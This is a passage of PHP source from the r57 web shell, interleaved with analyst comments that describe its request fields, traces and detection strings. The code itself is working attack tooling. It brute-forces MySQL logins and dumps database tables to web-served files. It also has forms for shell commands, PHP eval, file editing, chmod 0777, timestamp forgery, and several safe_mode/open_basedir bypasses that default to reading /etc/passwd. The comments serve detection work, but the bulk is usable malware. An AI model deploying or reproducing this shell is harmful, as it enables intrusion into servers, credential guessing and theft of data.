6188 if($sql->connect()) { echo "[+] $user:$user - success\r\n"; $suc++; }
6189
6190 }
6191
6192 if(isset($_POST['reverse']))
6193
6194 {
6195
6196 foreach($users as $user)
6197
6198 {
6199
6200 $sql = new my_sql();
6201
6202 $sql->db = $_POST['db'];
6203
6204 $sql->host = $_POST['db_server'];
6205
6206 $sql->port = $_POST['db_port'];
6207
6208 $sql->user = $user;
6209
6210 $sql->pass = strrev($user);
6211
6212 if($sql->connect()) { echo "[+] $user:".strrev($user)." - success\r\n"; $suc++; }
6213
6214 }
6215
6216 }
6217
6218 }else if(($_POST['brute_method']=='dic') && isset($_POST['mysql_l'])){
6219
6220 foreach($users as $user)
6221
6222 {
6223
6224 $sql = new my_sql();
6225
6226 $sql->db = $_POST['db'];
6227
6228 $sql->host = $_POST['db_server'];
6229
6230 $sql->port = $_POST['db_port'];
6231
6232 $sql->user = $_POST['mysql_l'];
6233
6234 $sql->pass = $user;
6235
6236 if($sql->connect()) { echo "[+] ".$_POST['mysql_l'].":$user - success\r\n"; $suc++; }
6237
6238 }
6239
6240 }
6241
6242 echo "\r\n-------------------------------------\r\n";
6243
// Summary: the attempt count is the list size, doubled when the reversed pass was requested.
6244 $count = count($users);
6245
6246 if(isset($_POST['reverse']) && ($_POST['brute_method']=='passwd')) { $count *= 2; }
6247
6248 echo $lang[$language.'_text97'].$count."\r\n";
6249
6250 echo $lang[$language.'_text98'].$suc."\r\n";
6251
6252 }
6253
6254
6255
// Analyst note: table dump through the my_sql class (defined elsewhere). Connection parameters,
// database and table name all come from the request. The dump lines are either printed into the
// report textarea or, when 'dif' is set, appended to the file named by 'dif_name' through
// morewrite() (helper defined elsewhere).
// Defender view: this is the data-theft step. Full-table reads issued by the application's
// database account, and dump files appearing in directories the web server can serve, are the
// traces; least-privilege database accounts and keeping the web root read-only for the web-server
// user limit what can be taken and where it can be staged.
6256if ($_POST['cmd']=="mysql_dump")
6257
6258 {
6259
// Writes a marker line first, which also creates the output file for the is_writable() check below.
6260 if(isset($_POST['dif'])) { morewrite($_POST['dif_name'], "mysql_dump\r\n"); }
6261
6262 $sql = new my_sql();
6263
6264 $sql->db = $_POST['db'];
6265
6266 $sql->host = $_POST['db_server'];
6267
6268 $sql->port = $_POST['db_port'];
6269
6270 $sql->user = $_POST['mysql_l'];
6271
6272 $sql->pass = $_POST['mysql_p'];
6273
6274 $sql->base = $_POST['mysql_db'];
6275
6276 if(!$sql->connect()) { echo "[-] ERROR! Can't connect to SQL server"; }
6277
6278 else if(!$sql->select_db()) { echo "[-] ERROR! Can't select database"; }
6279
6280 else if(!$sql->dump($_POST['mysql_tbl'])) { echo "[-] ERROR! Can't create dump"; }
6281
6282 else {
6283
// Dump lines are printed as-is, without htmlspecialchars(), unlike the command output above.
6284 if(empty($_POST['dif'])) { foreach($sql->dump as $v) echo $v."\r\n"; }
6285
6286 else if(@is_writable($_POST['dif_name'])){ foreach($sql->dump as $v){ morewrite($_POST['dif_name'], $v."\r\n");} }
6287
6288 else { echo "[-] ERROR! Can't write in dump file"; }
6289
6290 }
6291
6292 }
6293
6294
6295
// Closes the report textarea and its table, then opens the table that holds the control forms.
6296echo "</textarea></div>";
6297
6298echo "</b>";
6299
6300echo "</td></tr></table>";
6301
6302echo "<table width=100% cellpadding=0 cellspacing=0>";
6303
6304
6305
// Returns a clickable panel heading: an <a> whose onClick calls the page's change_divst() script
// function with $id. Both $title and $id are inserted into the markup without escaping.
6306function div_title($title, $id)
6307
6308{
6309
6310 return '<a style="cursor: pointer;" onClick="change_divst(\''.$id.'\');">'.$title.'</a>';
6311
6312}
6313
// Returns the opening <div> tag for panel $id, hidden or visible according to a cookie named after
// the panel: a cookie value loosely equal to 0 hides it; with no (or an empty) cookie the panels
// listed in $divid start hidden; in every other case the panel is shown.
// Triage hint: requests that carry cookies named id1, id5, ... are a side effect of this UI state.
6314function div($id)
6315
6316 {
6317
6318 if(isset($_COOKIE[$id]) && ($_COOKIE[$id]==0)) return '<div id="'.$id.'" style="display: none;">';
6319
// Panels that are collapsed by default.
6320 $divid=array('id5','id6','id8','id9','id10','id11','id16','id24','id25','id26','id27','id28','id29','id33','id34','id35','id37','id38','id39');
6321
6322 if(empty($_COOKIE[$id]) && @in_array($id,$divid)) return '<div id="'.$id.'" style="display: none;">';
6323
6324 return '<div id="'.$id.'">';
6325
6326 }
6327
6328
6329
// Analyst note: renders the first control forms. sr(), in() and ws() are HTML helpers defined
// elsewhere in the file; $fs/$fe, $ts/$te and the $table_* variables hold markup fragments.
// The forms show which request fields the script expects, which is what to search for in
// web-server and WAF logs: 'cmd' with 'dir' (command / directory form), 'e_name' with
// cmd=edit_file (file editor), and 'mk_name', 'action', 'what' with cmd=mk (create or delete a
// file or directory).
6330if(!$safe_mode){
6331
6332echo $fs.$table_up1.div_title($lang[$language.'_text2'],'id1').$table_up2.div('id1').$ts;
6333
6334echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','cmd',85,''));
6335
6336echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
6337
6338echo $te.'</div>'.$table_end1.$fe;
6339
6340}
6341
6342else{
6343
// Under safe_mode the free-text command box is replaced by a hidden cmd=safe_dir field.
6344echo $fs.$table_up1.div_title($lang[$language.'_text28'],'id2').$table_up2.div('id2').$ts;
6345
6346echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).in('hidden','cmd',0,'safe_dir').ws(4).in('submit','submit',0,$lang[$language.'_butt6']));
6347
6348echo $te.'</div>'.$table_end1.$fe;
6349
6350}
6351
6352echo $fs.$table_up1.div_title($lang[$language.'_text42'],'id3').$table_up2.div('id3').$ts;
6353
6354echo sr(15,"<b>".$lang[$language.'_text43'].$arrow."</b>",in('text','e_name',85,$dir).in('hidden','cmd',0,'edit_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt11']));
6355
6356echo $te.'</div>'.$table_end1.$fe;
6357
6358
6359
// The create/delete form is only offered when safe_mode or open_basedir is active.
6360if($safe_mode || $open_basedir){
6361
6362echo $fs.$table_up1.div_title($lang[$language.'_text57'],'id4').$table_up2.div('id4').$ts;
6363
// A previously posted mk_name is written back into the form field as received.
6364echo sr(15,"<b>".$lang[$language.'_text58'].$arrow."</b>",in('text','mk_name',54,(!empty($_POST['mk_name'])?($_POST['mk_name']):("new_name"))).ws(4)."<select name=action><option value=create>".$lang[$language.'_text65']."</option><option value=delete>".$lang[$language.'_text66']."</option></select>".ws(3)."<select name=what><option value=file>".$lang[$language.'_text59']."</option><option value=dir>".$lang[$language.'_text60']."</option></select>".in('hidden','cmd',0,'mk').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt13']));
6365
6366echo $te.'</div>'.$table_end1.$fe;
6367
6368}
6369
6370
6371
6372if($unix && @function_exists('touch')){
6373
6374echo $fs.$table_up1.div_title($lang[$language.'_text128'],'id5').$table_up2.div('id5').$ts;
6375
6376echo sr(15,"<b>".$lang[$language.'_text43'].$arrow."</b>",in('text','file_name',40,(!empty($_POST['file_name'])?($_POST['file_name']):($_SERVER["SCRIPT_FILENAME"])))
6377
6378.ws(4)."<b>".$lang[$language.'_text26'].ws(2).$lang[$language.'_text59'].$arrow."</b>"
6379
6380.ws(2).in('text','file_name_r',40,(!empty($_POST['file_name_r'])?($_POST['file_name_r']):(""))));
6381
6382echo sr(15,"<b> or set Day".$arrow."</b>",
6383
6384'
6385
6386<select name="day" size="1">
6387
6388<option value="01">1</option>
6389
6390<option value="02">2</option>
6391
6392<option value="03">3</option>
6393
6394<option value="04">4</option>
6395
6396<option value="05">5</option>
6397
6398<option value="06">6</option>
6399
6400<option value="07">7</option>
6401
6402<option value="08">8</option>
6403
6404<option value="09">9</option>
6405
6406<option value="10">10</option>
6407
6408<option value="11">11</option>
6409
6410<option value="12">12</option>
6411
6412<option value="13">13</option>
6413
6414<option value="14">14</option>
6415
6416<option value="15">15</option>
6417
6418<option value="16">16</option>
6419
6420<option value="17">17</option>
6421
6422<option value="18">18</option>
6423
6424<option value="19">19</option>
6425
6426<option value="20">20</option>
6427
6428<option value="21">21</option>
6429
6430<option value="22">22</option>
6431
6432<option value="23">23</option>
6433
6434<option value="24">24</option>
6435
6436<option value="25">25</option>
6437
6438<option value="26">26</option>
6439
6440<option value="27">27</option>
6441
6442<option value="28">28</option>
6443
6444<option value="29">29</option>
6445
6446<option value="30">30</option>
6447
6448<option value="31">31</option>
6449
6450</select>'
6451
6452.ws(4)."<b>Month".$arrow."</b>"
6453
6454.'
6455
6456<select name="month" size="1">
6457
6458<option value="January">January</option>
6459
6460<option value="February">February</option>
6461
6462<option value="March">March</option>
6463
6464<option value="April">April</option>
6465
6466<option value="May">May</option>
6467
6468<option value="June">June</option>
6469
6470<option value="July">July</option>
6471
6472<option value="August">August</option>
6473
6474<option value="September">September</option>
6475
6476<option value="October">October</option>
6477
6478<option value="November">November</option>
6479
6480<option value="December">December</option>
6481
6482</select>'
6483
6484.ws(4)."<b>Year".$arrow."</b>"
6485
6486.'
6487
6488<select name="year" size="1">
6489
6490<option value="1998">1998</option>
6491
6492<option value="1999">1999</option>
6493
6494<option value="2000">2000</option>
6495
6496<option value="2001">2001</option>
6497
6498<option value="2002">2002</option>
6499
6500<option value="2003">2003</option>
6501
6502<option value="2004">2004</option>
6503
6504<option value="2005">2005</option>
6505
6506<option value="2006">2006</option>
6507
6508<option value="2006">2007</option>
6509
6510<option value="2006">2008</option>
6511
6512<option value="2006">2009</option>
6513
6514<option value="2006">2010</option>
6515
6516</select>'
6517
6518.ws(4)."<b>Hour".$arrow."</b>"
6519
6520.'
6521
6522<select name="chasi" size="1">
6523
6524<option value="01">01</option>
6525
6526<option value="02">02</option>
6527
6528<option value="03">03</option>
6529
6530<option value="04">04</option>
6531
6532<option value="05">05</option>
6533
6534<option value="06">06</option>
6535
6536<option value="07">07</option>
6537
6538<option value="08">08</option>
6539
6540<option value="09">09</option>
6541
6542<option value="10">10</option>
6543
6544<option value="11">11</option>
6545
6546<option value="12">12</option>
6547
6548<option value="13">13</option>
6549
6550<option value="14">14</option>
6551
6552<option value="15">15</option>
6553
6554<option value="16">16</option>
6555
6556<option value="17">17</option>
6557
6558<option value="18">18</option>
6559
6560<option value="19">19</option>
6561
6562<option value="20">20</option>
6563
6564<option value="21">21</option>
6565
6566<option value="22">22</option>
6567
6568<option value="23">23</option>
6569
6570<option value="24">24</option>
6571
6572</select>'
6573
6574.ws(4)."<b>Minute".$arrow."</b>"
6575
6576.'
6577
6578<select name="minutes" size="1">
6579
6580<option value="01">1</option>
6581
6582<option value="02">2</option>
6583
6584<option value="03">3</option>
6585
6586<option value="04">4</option>
6587
6588<option value="05">5</option>
6589
6590<option value="06">6</option>
6591
6592<option value="07">7</option>
6593
6594<option value="08">8</option>
6595
6596<option value="09">9</option>
6597
6598<option value="10">10</option>
6599
6600<option value="11">11</option>
6601
6602<option value="12">12</option>
6603
6604<option value="13">13</option>
6605
6606<option value="14">14</option>
6607
6608<option value="15">15</option>
6609
6610<option value="16">16</option>
6611
6612<option value="17">17</option>
6613
6614<option value="18">18</option>
6615
6616<option value="19">19</option>
6617
6618<option value="20">20</option>
6619
6620<option value="21">21</option>
6621
6622<option value="22">22</option>
6623
6624<option value="23">23</option>
6625
6626<option value="24">24</option>
6627
6628<option value="25">25</option>
6629
6630<option value="26">26</option>
6631
6632<option value="27">27</option>
6633
6634<option value="28">28</option>
6635
6636<option value="29">29</option>
6637
6638<option value="30">30</option>
6639
6640<option value="31">31</option>
6641
6642<option value="32">32</option>
6643
6644<option value="33">33</option>
6645
6646<option value="34">34</option>
6647
6648<option value="35">35</option>
6649
6650<option value="36">36</option>
6651
6652<option value="37">37</option>
6653
6654<option value="38">38</option>
6655
6656<option value="39">39</option>
6657
6658<option value="40">40</option>
6659
6660<option value="41">41</option>
6661
6662<option value="42">42</option>
6663
6664<option value="43">43</option>
6665
6666<option value="44">44</option>
6667
6668<option value="45">45</option>
6669
6670<option value="46">46</option>
6671
6672<option value="47">47</option>
6673
6674<option value="48">48</option>
6675
6676<option value="49">49</option>
6677
6678<option value="50">50</option>
6679
6680<option value="51">51</option>
6681
6682<option value="52">52</option>
6683
6684<option value="53">53</option>
6685
6686<option value="54">54</option>
6687
6688<option value="55">55</option>
6689
6690<option value="56">56</option>
6691
6692<option value="57">57</option>
6693
6694<option value="58">58</option>
6695
6696<option value="59">59</option>
6697
6698</select>'
6699
6700.ws(4)."<b>Second".$arrow."</b>"
6701
6702.'
6703
6704<select name="second" size="1">
6705
6706<option value="01">1</option>
6707
6708<option value="02">2</option>
6709
6710<option value="03">3</option>
6711
6712<option value="04">4</option>
6713
6714<option value="05">5</option>
6715
6716<option value="06">6</option>
6717
6718<option value="07">7</option>
6719
6720<option value="08">8</option>
6721
6722<option value="09">9</option>
6723
6724<option value="10">10</option>
6725
6726<option value="11">11</option>
6727
6728<option value="12">12</option>
6729
6730<option value="13">13</option>
6731
6732<option value="14">14</option>
6733
6734<option value="15">15</option>
6735
6736<option value="16">16</option>
6737
6738<option value="17">17</option>
6739
6740<option value="18">18</option>
6741
6742<option value="19">19</option>
6743
6744<option value="20">20</option>
6745
6746<option value="21">21</option>
6747
6748<option value="22">22</option>
6749
6750<option value="23">23</option>
6751
6752<option value="24">24</option>
6753
6754<option value="25">25</option>
6755
6756<option value="26">26</option>
6757
6758<option value="27">27</option>
6759
6760<option value="28">28</option>
6761
6762<option value="29">29</option>
6763
6764<option value="30">30</option>
6765
6766<option value="31">31</option>
6767
6768<option value="32">32</option>
6769
6770<option value="33">33</option>
6771
6772<option value="34">34</option>
6773
6774<option value="35">35</option>
6775
6776<option value="36">36</option>
6777
6778<option value="37">37</option>
6779
6780<option value="38">38</option>
6781
6782<option value="39">39</option>
6783
6784<option value="40">40</option>
6785
6786<option value="41">41</option>
6787
6788<option value="42">42</option>
6789
6790<option value="43">43</option>
6791
6792<option value="44">44</option>
6793
6794<option value="45">45</option>
6795
6796<option value="46">46</option>
6797
6798<option value="47">47</option>
6799
6800<option value="48">48</option>
6801
6802<option value="49">49</option>
6803
6804<option value="50">50</option>
6805
6806<option value="51">51</option>
6807
6808<option value="52">52</option>
6809
6810<option value="53">53</option>
6811
6812<option value="54">54</option>
6813
6814<option value="55">55</option>
6815
6816<option value="56">56</option>
6817
6818<option value="57">57</option>
6819
6820<option value="58">58</option>
6821
6822<option value="59">59</option>
6823
6824</select>'
6825
6826.in('hidden','cmd',0,'touch')
6827
6828.in('hidden','dir',0,$dir)
6829
6830.ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
6831
6832echo $te.'</div>'.$table_end1.$fe;
6833
6834}
6835
6836
6837
// Permission/ownership section. $select collects one <option> per PHP function
// that exists (chmod, chown, chgrp); the form is printed only when $unix is
// truthy and at least one option was added. Hidden `cmd` is 'ch_'; `param1`
// defaults to $_SERVER["SCRIPT_FILENAME"] (this script's own path) and
// `param2` to "0777". The handler is not visible in this excerpt.
// The leading @ on sr() silences the notices raised by reading
// $_POST['param1'] / $_POST['param2'] when they are unset.
// Incident response: after finding this panel, audit mode and ownership of
// files in the web root instead of assuming deployment-time values still hold.
6838$select='';
6839
6840if(@function_exists('chmod')){$select .= "<option value=mod>CHMOD</option>";}
6841
6842if(@function_exists('chown')){$select .= "<option value=own>CHOWN</option>";}
6843
6844if(@function_exists('chgrp')){$select .= "<option value=grp>CHGRP</option>";}
6845
6846if($unix && $select){
6847
6848echo $fs.$table_up1.div_title($lang[$language.'_text67'],'id6').$table_up2.div('id6').$ts;
6849
6850echo @sr(15,"<b>".$lang[$language.'_text43'].$arrow."</b>",in('text','param1',55,(($_POST['param1'])?($_POST['param1']):($_SERVER["SCRIPT_FILENAME"]))).ws(2)."<b>".$lang[$language.'_text68'].$arrow."</b>"."<select name=what>".$select."</select>".ws(4).in('text','param2 title="'.$lang[$language.'_text71'].'"',10,(($_POST['param2'])?($_POST['param2']):("0777"))).in('hidden','cmd',0,'ch_').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
6851
6852echo $te.'</div>'.$table_end1.$fe;
6853
6854}
6855
6856
6857
// Alias section, printed only when $safe_mode is false. The loop turns each key
// of $aliases into an <option> of the `alias` select; the value half of each
// pair ($alias_cmd) is not used inside this loop. $aliases itself is defined
// outside this excerpt, as is whatever acts on the submitted `alias` value.
// Alias names are interpolated into the markup without escaping on this line.
6858if(!$safe_mode){
6859
6860$aliases2 = '';
6861
6862foreach ($aliases as $alias_name=>$alias_cmd)
6863
6864 {
6865
6866 $aliases2 .= "<option>$alias_name</option>";
6867
6868 }
6869
6870echo $fs.$table_up1.div_title($lang[$language.'_text7'],'id7').$table_up2.div('id7').$ts;
6871
6872echo sr(15,"<b>".ws(9).$lang[$language.'_text8'].$arrow.ws(4)."</b>","<select name=alias>".$aliases2."</select>".in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
6873
6874echo $te.'</div>'.$table_end1.$fe;
6875
6876}
6877
6878
6879
6880echo $fs.$table_up1.div_title($lang[$language.'_text54'],'id8').$table_up2.div('id8').$ts;
6881
6882echo sr(15,"<b>".$lang[$language.'_text52'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12']));
6883
6884echo sr(15,"<b>".$lang[$language.'_text53'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;$tempdir )");
6885
6886echo sr(15,"<b>".$lang[$language.'_text55'].$arrow."</b>",in('checkbox','m id=m',0,'1').in('text','s_mask',82,'.txt;.php')."* ( .txt;.php;.htm )".in('hidden','cmd',0,'search_text').in('hidden','dir',0,$dir));
6887
6888echo $te.'</div>'.$table_end1.$fe;
6889
6890
6891
6892if(!$safe_mode && $unix){
6893
6894echo $fs.$table_up1.div_title($lang[$language.'_text76'],'id9').$table_up2.div('id9').$ts;
6895
6896echo sr(15,"<b>".$lang[$language.'_text72'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12']));
6897
6898echo sr(15,"<b>".$lang[$language.'_text73'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;$tempdir )");
6899
6900echo sr(15,"<b>".$lang[$language.'_text74'].$arrow."</b>",in('text','s_mask',85,'*.[hc]').ws(1).$lang[$language.'_text75'].in('hidden','cmd',0,'find_text').in('hidden','dir',0,$dir));
6901
6902echo $te.'</div>'.$table_end1.$fe;
6903
6904}
6905
6906
6907
// PHP-eval section, printed unconditionally: a <textarea name=php_eval> plus a
// hidden `cmd` of 'php_eval'. The handler is not visible in this excerpt.
// $_POST['php_eval'] is echoed back into the textarea as-is; no escaping is
// applied on that line.
// The default text names "r57shell.php". Together with the field names used
// here it identifies the r57 web-shell family and gives a stable string for
// file-content scanning (YARA rules, grep over the web root).
6908echo $fs.$table_up1.div_title($lang[$language.'_text32'],'id10').$table_up2.$font;
6909
6910echo "<div align=center>".div('id10')."<textarea name=php_eval cols=100 rows=10>";
6911
6912echo (!empty($_POST['php_eval'])?($_POST['php_eval']):("//unlink(\"r57shell.php\");\r\n//readfile(\"/etc/passwd\");\r\n//file_get_content(\"/etc/passwd\");"));
6913
6914echo "</textarea>";
6915
6916echo in('hidden','dir',0,$dir).in('hidden','cmd',0,'php_eval');
6917
6918echo "<br>".ws(1).in('submit','submit',0,$lang[$language.'_butt1']);
6919
6920echo "</div></div></font>";
6921
6922echo $table_end1.$fe;
6923
6924
6925
6926if($safe_mode || $open_basedir)
6927
6928{
6929
6930echo $fs.$table_up1.div_title($lang[$language.'_text34'],'id11').$table_up2.div('id11').$ts;
6931
6932echo "<table class=table1 width=100% align=center>";
6933
6934echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test2_file',85,(!empty($_POST['test2_file'])?($_POST['test2_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test2').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
6935
6936echo $te.'</div>'.$table_end1.$fe;
6937
6938}
6939
6940
6941
6942if(($safe_mode || $open_basedir) && $curl_on && @version_compare(@phpversion(),"5.2.0")<=0)
6943
6944{
6945
6946echo $fs.$table_up1.div_title($lang[$language.'_text33'],'id12').$table_up2.div('id12').$ts;
6947
6948echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test1_file',85,(!empty($_POST['test1_file'])?($_POST['test1_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test1').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
6949
6950echo $te.'</div>'.$table_end1.$fe;
6951
6952}
6953
6954
6955
6956if(($safe_mode || $open_basedir) && $mysql_on)
6957
6958{
6959
6960echo $fs.$table_up1.div_title($lang[$language.'_text35'],'id13').$table_up2.div('id13').$ts;
6961
6962echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test3_md',15,(!empty($_POST['test3_md'])?($_POST['test3_md']):("mysql"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test3_ml',15,(!empty($_POST['test3_ml'])?($_POST['test3_ml']):("root"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test3_mp',15,(!empty($_POST['test3_mp'])?($_POST['test3_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test3_port',15,(!empty($_POST['test3_port'])?($_POST['test3_port']):("3306"))));
6963
6964echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test3_file',96,(!empty($_POST['test3_file'])?($_POST['test3_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test3').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
6965
6966echo $te.'</div>'.$table_end1.$fe;
6967
6968}
6969
6970
6971
6972if(($safe_mode || $open_basedir) && $mysqli_on)
6973
6974{
6975
6976echo $fs.$table_up1.div_title($lang[$language.'_text144'],'id40').$table_up2.div('id40').$ts;
6977
6978echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test19_md',15,(!empty($_POST['test19_md'])?($_POST['test19_md']):("mysqli"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test19_ml',15,(!empty($_POST['test19_ml'])?($_POST['test19_ml']):("root"))).ws(4)."<b>".$lang[$language.'_text39'].$arrow."</b>".in('text','test19_mp',15,(!empty($_POST['test19_mp'])?($_POST['test19_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test19_port',15,(!empty($_POST['test19_port'])?($_POST['test19_port']):("3306"))));
6979
6980echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test19_file',96,(!empty($_POST['test19_file'])?($_POST['test19_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test19').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
6981
6982echo $te.'</div>'.$table_end1.$fe;
6983
6984}
6985
6986
6987
6988if(($safe_mode || $open_basedir) && $mssql_on)
6989
6990{
6991
6992echo $fs.$table_up1.div_title($lang[$language.'_text85'],'id14').$table_up2.div('id14').$ts;
6993
6994echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test4_md',15,(!empty($_POST['test4_md'])?($_POST['test4_md']):("master"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test4_ml',15,(!empty($_POST['test4_ml'])?($_POST['test4_ml']):("sa"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test4_mp',15,(!empty($_POST['test4_mp'])?($_POST['test4_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test4_port',15,(!empty($_POST['test4_port'])?($_POST['test4_port']):("1433"))));
6995
6996echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','test4_file',96,(!empty($_POST['test4_file'])?($_POST['test4_file']):("dir"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test4').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
6997
6998echo $te.'</div>'.$table_end1.$fe;
6999
7000}
7001
7002
7003
7004
7005
7006if(($safe_mode || $open_basedir) && $unix && @function_exists('mb_send_mail') && @version_compare(@phpversion(),"5.2.0")<=0){
7007
7008echo $fs.$table_up1.div_title($lang[$language.'_text112'],'id15').$table_up2.div('id15').$ts;
7009
7010echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test5_file',96,(!empty($_POST['test5_file'])?($_POST['test5_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test5').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
7011
7012echo $te.'</div>'.$table_end1.$fe;
7013
7014}
7015
7016
7017
7018if(($safe_mode || $open_basedir) && @function_exists('imap_open') && @function_exists('imap_list') && @version_compare(@phpversion(),"5.2.0")<=0){
7019
7020echo $fs.$table_up1.div_title($lang[$language.'_text113'],'id20').$table_up2.div('id20').$ts;
7021
7022echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','test6_file',96,(!empty($_POST['test6_file'])?($_POST['test6_file']):($dir))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test6').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
7023
7024echo $te.'</div>'.$table_end1.$fe;
7025
7026}
7027
7028
7029
7030if(($safe_mode || $open_basedir) && @function_exists('imap_open') && @function_exists('imap_body') && @version_compare(@phpversion(),"5.2.0")<=0){
7031
7032echo $fs.$table_up1.div_title($lang[$language.'_text114'],'id21').$table_up2.div('id21').$ts;
7033
7034echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test7_file',96,(!empty($_POST['test7_file'])?($_POST['test7_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test7').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
7035
7036echo $te.'</div>'.$table_end1.$fe;
7037
7038}
7039
7040
7041
7042if(($safe_mode || $open_basedir) && @function_exists('copy') && @version_compare(@phpversion(),"5.2.0")<=0)
7043
7044{
7045
7046echo $fs.$table_up1.div_title($lang[$language.'_text115'],'id22').$table_up2.div('id22').$ts;
7047
7048echo sr(15,"<b>".$lang[$language.'_text116'].$arrow."</b>",in('text','test8_file1',96,(!empty($_POST['test8_file1'])?($_POST['test8_file1']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test8'));
7049
7050echo sr(15,"<b>".$lang[$language.'_text117'].ws(2).$lang[$language.'_text60'].$arrow."</b>",in('text','test8_file2',96,(!empty($_POST['test8_file2'])?($_POST['test8_file2']):($dir))).ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
7051
7052echo $te.'</div>'.$table_end1.$fe;
7053
7054}
7055
7056
7057
7058if(($safe_mode || $open_basedir) && @function_exists('ini_restore') && @version_compare(@phpversion(),"5.2.0")<=0){
7059
7060echo $fs.$table_up1.div_title($lang[$language.'_text120'],'id23').$table_up2.div('id23').$ts;
7061
7062echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test9_file',96,(!empty($_POST['test9_file'])?($_POST['test9_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test9').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
7063
7064echo $te.'</div>'.$table_end1.$fe;
7065
7066}
7067
7068
7069
7070if(($safe_mode || $open_basedir) && @version_compare(@phpversion(),"5.0.0")<0){
7071
7072echo $fs.$table_up1.div_title($lang[$language.'_text121'],'id24').$table_up2.div('id24').$ts;
7073
7074echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','test10_file',96,(!empty($_POST['test10_file'])?($_POST['test10_file']):($dir))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test10').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
7075
7076echo $te.'</div>'.$table_end1.$fe;
7077
7078}
7079
7080
7081
7082if(($safe_mode || $open_basedir) && @function_exists('glob') && @version_compare(@phpversion(),"5.2.2")<=0){
7083
7084echo $fs.$table_up1.div_title($lang[$language.'_text122'],'id19').$table_up2.div('id19').$ts;
7085
7086echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',96,(!empty($_POST['test_global'])?($_POST['test_global']):($dir))).in('hidden','cmd',0,'safe_dir').in('hidden','glob',0,'glob').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
7087
7088echo $te.'</div>'.$table_end1.$fe;
7089
7090}
7091
7092
7093
7094if(($safe_mode || $open_basedir) && @function_exists('realpath') && @version_compare(@phpversion(),"5.2.4")<=0){
7095
7096$select_n_rlph = "<select name='n_rlph'><option value=1>[ 1 ] (<<0,01 sec)</option><option value=2>[ 2 ] (<0,01 sec)</option>".
7097
7098"<option value=3 selected>[ 3 ] (<1 sec (default))</option>".
7099
7100"<option value=4>[ 4 ] (<10 sec)</option><option value=5>[ 5 ] (>100 sec (danger))</option><option value=6>[ 6 ] (>>100 sec (danger))</option></select>";
7101
7102echo $fs.$table_up1.div_title($lang[$language.'_text145'],'id41').$table_up2.div('id41').$ts;
7103
